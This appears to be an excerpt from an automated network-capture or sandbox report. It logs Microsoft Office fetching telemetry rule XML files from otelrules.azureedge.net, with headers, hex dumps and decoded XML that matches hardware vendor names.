                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153701Z-174f7845968px8v7hC1EWR08ng00000005b000000000ke40
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        42192.168.2.44979713.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:01 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 5eaa081d-f01e-0099-68d5-339171000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153701Z-174f7845968vqt9xhC1EWRgten000000053g00000000mg3e
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        43192.168.2.44979513.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:01 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 420
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 78b03680-101e-000b-4bd5-335e5c000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153701Z-174f7845968qj8jrhC1EWRh41s00000004y000000000sgkc
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        44192.168.2.44979613.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:01 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 186f8a49-401e-005b-46d5-339c0c000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153701Z-174f7845968glpgnhC1EWR7uec000000059000000000e5a0
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        45192.168.2.44979813.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:01 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 072c0228-901e-00ac-3ad5-33b69e000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153701Z-174f7845968xlwnmhC1EWR0sv800000004wg00000000nsmz
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        46192.168.2.44979913.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:01 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 423
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 8377dffe-c01e-00a1-6ad5-337e4a000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153701Z-174f7845968pf68xhC1EWRr4h800000005c000000000dvfu
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        47192.168.2.44980313.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:02 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:02 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 642c93e8-001e-0014-7cd5-335151000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153702Z-174f7845968t42glhC1EWRa36w00000004tg00000000n4y7
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:02 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        48192.168.2.44980013.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:02 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:02 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 478
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                                                        x-ms-request-id: a7e44230-001e-0082-7dd5-335880000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153702Z-174f78459684bddphC1EWRbht400000004wg000000009zwb
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:02 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        49192.168.2.44980213.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:02 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:02 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                                                        x-ms-request-id: c8358df5-201e-005d-53d5-33afb3000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153702Z-174f7845968t42glhC1EWRa36w00000004v000000000f9v0
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:02 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        50192.168.2.44980113.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:02 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:02 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB046B576"
